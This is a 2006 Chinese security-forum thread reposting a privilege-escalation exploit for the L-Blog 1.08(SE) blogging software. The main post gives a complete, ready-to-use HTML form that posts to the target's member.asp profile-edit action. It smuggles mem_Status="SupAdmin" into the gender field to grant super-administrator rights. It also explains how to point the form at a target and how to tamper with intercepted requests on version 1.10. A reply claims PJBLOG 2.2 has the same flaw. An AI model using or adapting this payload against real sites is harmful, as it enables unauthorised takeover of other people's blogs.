‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]L-Blog1.08(SE) 提权漏洞

hack520

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1082 
精华
6 
积分
5597 
阅读权限
150 
性别
男 
在线时间
576 小时 
注册时间
2005-3-18 
最后登录
2008-7-2 
楼主 发表于 2006-2-27 09:16  只看该作者

[转载]L-Blog1.08(SE) 提权漏洞

信息来源:未知

<html>
<head>
</head>
<body>
<table width="768" border="0" align="center" cellpadding="4" cellspacing="6" background="images/blog_main.gif">
  <tr>
   <td width="128" align="center"><strong>用户编辑</strong></td>
   <td valign="top" align="center"><table width="95%" border="0" cellpadding="4" cellspacing="1" bgcolor="#CCCCCC">
    <tr bgcolor="#EFEFEF">
      <td colspan="2"><b>编辑个人资料</b></td>
      </tr>
  <tr bgcolor="#FFFFFF"><form action="http://url/member.asp?action=edit&edit=post" method="post" name="Submit" id="Submit">
      <td width="98" align="right" nowrap>名称:</td>
      <td width="100%"> 9xiao</td>
      </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>旧密码:</td>
      <td> <input name="mem_OldPassword" type="password" id="mem_OldPassword" size="16">
       <span class="htd"><b><font color="#FF0000"> *</font></b> 修改资料必须输入原密码</span></td>
    </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>新密码:</td>
      <td> <input name="mem_NewPassword" type="password" id="mem_NewPassword" size="16">
        <span class="htd"><b><font color="#FF0000">*</font></b> 密码必须是6-16位</span></td>
    </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>确认密码:</td>
      <td> <input name="mem_RePassword" type="password" id="mem_RePassword" size="16"></td>
    </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>性别:</td>
      <td><input name="mem_Sex" type="text" size="36" value=0,mem_Status="SupAdmin"  ></td>
    </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>邮箱:</td>
      <td> <input name="mem_Email" type="text" id="mem_Email" value="pyadong at 263 dot net" size="30">
        
       <input name="mem_HideEmail" type="checkbox" id="mem_HideEmail" value="1" >
       隐藏邮箱</td>
    </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>腾讯QQ:</td>
      <td> <input name="mem_QQ" type="text" id="mem_QQ" value=""></td>
    </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>个人主页:</td>
      <td> <input name="mem_HomePage" type="text" id="mem_HomePage" value="" size="35"></td>
    </tr>
    <tr bgcolor="#FFFFFF">
      <td align="right" nowrap>个人简介:</td>
      <td> <textarea name="mem_Intro" cols="50" rows="5" wrap="VIRTUAL" id="mem_Intro"></textarea></td>
    </tr>
    <tr align="center" bgcolor="#FFFFFF">
      <td colspan="2">
       <input type="submit" name="Submit" value=" 确定编辑 ">
      </td>
      </tr></form>
   </table></td>
  </tr>
</table></body>
</html>

action="http://url/member.asp?action=edit&edit=post" 替换为目标url,1.10版本抓包修改mem_Sex值为“0,mem_Status="SupAdmin"”
Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。

TOP

黑病毒

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
133 
精华
10 
积分
3954 
阅读权限
200 
性别
男 
在线时间
20 小时 
注册时间
2004-11-7 
最后登录
2008-7-8 

原创技术奖

沙发 发表于 2006-3-1 23:51  只看该作者
呵。PJBLOG2.2也有此漏洞。
QHK-EST-邪恶八进制 为技术而活着的人 渴望研究技术的美 永远追随技术最高峰!!!

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题